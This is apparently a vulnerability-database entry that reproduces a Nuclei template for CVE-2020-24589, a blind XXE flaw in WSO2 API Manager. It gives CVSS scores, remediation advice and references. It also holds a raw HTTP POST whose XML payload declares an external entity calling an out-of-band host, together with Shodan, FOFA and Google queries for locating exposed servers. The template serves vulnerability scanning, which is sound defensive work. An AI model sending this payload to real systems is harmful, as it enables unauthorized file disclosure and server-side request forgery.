ProjectDiscoveryNUCLEI:CVE-2020-24589WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection
6.4 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:N/A:P
9.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
9.3 High
AI Score
Confidence
High
0.648 Medium
EPSS
Percentile
97.9%
WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls.
id: CVE-2020-24589
info:
name: WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection
author: lethargynavigator
severity: critical
description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, denial of service, or server-side request forgery.
remediation: |
Upgrade to a patched version of WSO2 API Manager (3.1.1 or above) or apply the provided security patch.
reference:
- https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742
- https://nvd.nist.gov/vuln/detail/CVE-2020-24589
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/athiththan11/WSO2-CVE-Extractor
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
cvss-score: 9.1
cve-id: CVE-2020-24589
cwe-id: CWE-611
epss-score: 0.64778
epss-percentile: 0.97891
cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: wso2
product: api_manager
shodan-query: http.favicon.hash:1398055326
fofa-query: icon_hash=1398055326
google-query: inurl:"carbon/admin/login"
tags: cve2020,cve,wso2,xxe,oast,blind
http:
- raw:
- |
POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
payload=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+"http%3a//{{interactsh-url}}">%25xxe%3b]>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- "Failed to install the generic artifact type"
# digest: 4a0a00473045022100a46002c04b61e32de82a96a52b9b729882e74fa21aaaea3fc4c33bac965f7897022010b04d7670233afd72f3ee1137579adc1b40f09a0b771f769deba4e19d5069e1:922c64590222798bb761d5b6d8e72950Related
6.4 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:N/A:P
9.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
9.3 High
AI Score
Confidence
High
0.648 Medium
EPSS
Percentile
97.9%